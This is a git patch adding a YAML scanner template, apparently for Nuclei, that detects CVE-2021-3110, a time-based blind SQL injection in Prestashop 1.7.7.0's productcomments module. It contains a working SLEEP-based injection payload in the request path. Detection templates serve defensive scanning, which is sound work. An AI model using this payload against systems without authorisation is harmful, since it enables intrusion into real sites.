From 72c56e0ff027d99b29de25ea65cd66aaca6ae555 Mon Sep 17 00:00:00 2001
From: jaimin4949 <62239432+jaimin4949@users.noreply.github.com>
Date: Thu, 18 Feb 2021 01:57:08 +0530
Subject: [PATCH] CVE-2021-3110 Blind Sqli

---
 cves/2021/CVE-2021-3110.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 cves/2021/CVE-2021-3110.yaml

diff --git a/cves/2021/CVE-2021-3110.yaml b/cves/2021/CVE-2021-3110.yaml
new file mode 100644
index 0000000000..5f693d7800
--- /dev/null
+++ b/cves/2021/CVE-2021-3110.yaml
@@ -0,0 +1,24 @@
+id: cve-2021-3110
+
+info:
+  name: prestshop CMS SQL Injection
+  author: Jaimin Gondaliya
+  severity: high
+  description: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
+
+  
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "average_grade"
+          - "1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)"
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200
\ No newline at end of file